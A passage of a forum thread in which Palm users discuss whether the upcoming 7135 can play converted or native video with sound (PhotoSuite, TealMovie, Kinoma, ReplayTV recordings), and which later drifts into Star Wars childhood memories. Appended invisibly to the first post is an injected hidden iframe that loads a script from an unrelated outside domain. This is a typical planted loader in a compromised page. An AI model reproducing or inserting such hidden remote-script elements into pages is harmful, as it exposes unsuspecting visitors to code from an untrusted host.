Hello everybody - I am also waiting for the 7135 to make its debut. :hapface
I know it has been established that the 7135 is shipped with photosuite (PS), however I still have a few questions about it for those who are lucky enough to already have a 7135 and have been gracious enough to answer the questions posted so far.
1.) Does the 7135 version of PS have sound with its movies?
The PS version I have on my IIIc is 2.2.2 (build 079.550). I converted a .WMV clip with sound and the palm PDB version (albeit the IIIc does not have a good speaker at ALL) does not have any sound- unlike Tealmovie which attempts to play movies with sound.
2.) As I mentioned above, the PS I have plays converted movies which are stored as PDBs -- Does the 7135 PS play unconverted AVI, Mpg, etc. directly form the SD? or do they have to be converted first and stored as PDBs on the SD?
I would like to hopefully have a 7135 play videos from the SD/MMC card WITH SOUND. (using unconverted video files on it copied from my computer would be a bonus, cause i could then use the Cruzer to send them my 7135 SD & to copy em to others via USB )
If the 7135 cant do this out of the box, Can one of the 7135 testers try out Teal movie and/or the Kinoma player?
I don't have Kinoma, however it sounds like it can handle the sound part (which hopefully supports the 7135's mp3 audio features) the downside of kinoma is it appears to have a proprietary video format which (like the 2.2.2 Photosuite) needs have a desktop tool to convert the files first.
My goal would be to flip out my future 7135 and watch a video every now and then or use it to show presentations in one on one meetings. Thanks in advance for you help.
----------------
By the way - not to start a chat thread, but Thank you ALL for the information everyone here has found so far - I do not own a 6035 and I am looking VERY foward to having a phone in my palm and I am sure I will have questions for those who have 6035's -- I've been a Palm user for quite a while and hopefully can answer questions as well.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
Steve,
I too am extremely interested is watching video clips on my future 7135. I would love to watch a movie or TV show on it.
Do you have any plans on how to get these for your SD card?
I have a "ReplayTV" unit which can supposedly transfer TV shows to my PC (with the unofficial hack software), but I don't yet know how exactly to do it. Do you have any experience with that?
I see you are from the land of the Twins too, perhaps we could work on it together.
Also, since we will have a tiny screen (on the 7135) compared to a TV set, can we convert the shows in some way for the smaller screen so as to take up less MB's (in addition to editing out commercials, etc.)?

I am glad I am not alone on this idea- My fear is that the processor will have a lot to do with the video and sound, but Tealmovie on my IIIC does it, just with very poor sound - Im hoping they update it to take advantage of the 7135's new mp3 abilities.
My brother is actually working on hacking his ReplayTV's (I have one and im waiting for him to mess his up first) he has two of them and also a Dishplayer as well --- I think the first hack he's waiting to do is put a larger harddrive into his replaytvs.
In the meantime we have been expirementing with video capture cards- I have a ATI card and he has an external usb (dazzle?) card. we have been able to get a 30 min show down to 21 mins (1 hour show down to 42 minutes without commercials ) so it appears that most 1/2 hr shows have 9 mins of commercials. As far as resolution goes- they are currently in 352x240- with ms-Mpeg4 and average around 20-30 mb in size for a low quality version (35kbps)
I'm hoping if the 7135 has the ability to play them, then the files could be resampled and letterboxed or cropped at 160x160 and maybe lose 10% of their file size, without compromizing quality.
I have kinda put the "mobile video" idea on pause because I don't have the time and I am waiting to hear if the included 7135 "photosuite" can actually handle standard video files (mpg, avi, wmf) in thier native formats with sound-- And does it autoscale the size when they are played? most palm video players seem to have a conversion utility which crops and re-encodes the various video to a standard format-(wouldnt do a lot of good if you wanted to drag n drog existing videos to a USB SD device such as a Sandisk Cruzer)
---- however, if it can handle divX format (which uses mp3 for its sound) then we maybe we could cram an entire StarWars Episode on a 256mb card and get The trilogy on the 1gb card.
The videos would of course not be my primary funtion of the 7135, But one funny idea would be to have a mock up "video phone" using a prerecorded video of one side of a conversation....
With 3g speeds, someday maybe one could stream unlimted lengths of video to it, provided the unit can handle it. -- also I wonder if a SD cam could perform video capture and then send it to a webserver via 3G? hmmm wouldnt that be interesting....
---------------------------
I'm always pushing it to the limits!

I have 3 ReplayTV units: A) 4080 [with internet/PC connection], B) 3060 [w/ upgraded 80G HD], C) 2000
I'm very glad to hear that you are interested in adapting videos for the 7135, you have ReplayTV's and that you live in Minnesota.
Once we get our 7135's and you get a little more time on your hands, I would love to work on some of this stuff with you.
If we think it is great reading ebooks while waiting in line, etc. just think how much fun it would be to watch entire shows. Plus we would look SO COOL in public.
And if not SplashPhoto, then let's find some other great app. Would FireViewer work? What do the latest Sony Clie owners use?

Please share whatever you come up with! I'm really looking forward to being able to watch recorded shows on the 7135! :clap

It lists the 6035 as compatable, so I'm sure the 7135 will be. But we should all email them to encourage them anyway.
Also, for sound, its FAQ says...
What kind of audio does Kinoma Producer support?
Kinoma Producer provides the most comprehensive support available for audio on Palm handhelds. Kinoma Producer can encode audio for every Palm handheld in the market.

WHOA -- The Simpsons WAS the episode I was referring to in my previous post! -- I have enough them that I'm thinking it would be cool to have a batch file that copies a new one to my SD cuzer daily (overwriting the old one in the process).
I also mentioned the Kinoma play in the thread starter-- It sounds very flexible, I have been meaning to play with it, just wanted to wait until I have time and find out how well it works:
1.) Any 7135 testers out there want to stop testing boring things and try something :coolquick ? (I'm sure nothings boring when it comes to the 7135 however!) Please let us know what you have found about the 7135's included multimeda abilities and if you have the time to try kinoma on it that would be very helpful as well.
2.) Any existing Kinoma users out there? How well does it perform on your palms?

That's for sure! I don't think I'll be able to put it down once I get it in my hands.... I'm already planning to take a day or two off of work. I don't think I've been this excited about getting a new "toy" since back in the day when I was waiting for the latest Star Wars action figure (loved Darth Vader with the extendable light saber, and the little Jawa's with the cloth cloaks).

lol... I don't know what it was about them... I guess I liked it so much because it was one of the few action figures that were more than just plastic. I also remember really liking Greedo and Bobafett.... because they were both hard to get. I remember spending most of my allowance buying Star Wars trading cards from the ice cream truck that was always parked down the street from my elementary school after school.
:offtopic Back to the topic at hand.... it would be really cool to be able to watch Star Wars on the 7135 :clap

Mine didn't! "Mr. Softy" only had ice cream.
Incidentally, a company name like "Mr. Softy" wouldn't fly in this new age of Viagra.
I think I am a little older than you Robert K, because I also remember girls exchanging "Charlie's Angels" cards on the playground.
I also remember that I wanted to get some from the girls, because Farrah and company were hot.
lol... I think it was the "Good Humor" ice cream truck that we had. I think we're probably about the same age... I'm 33. I remember that the local shopping center had a store that sold posters... including that famous Farrah one where she was wearing the bathing suit That was also the same shopping center where the movie theater was where I saw Star Wars on opening day.... it was within walking distance and me and some friends went and saw it probably a half dozen times in the course of a couple weeks. :clap
I wonder what I did with all of those action figures anyway? I can't even remember!
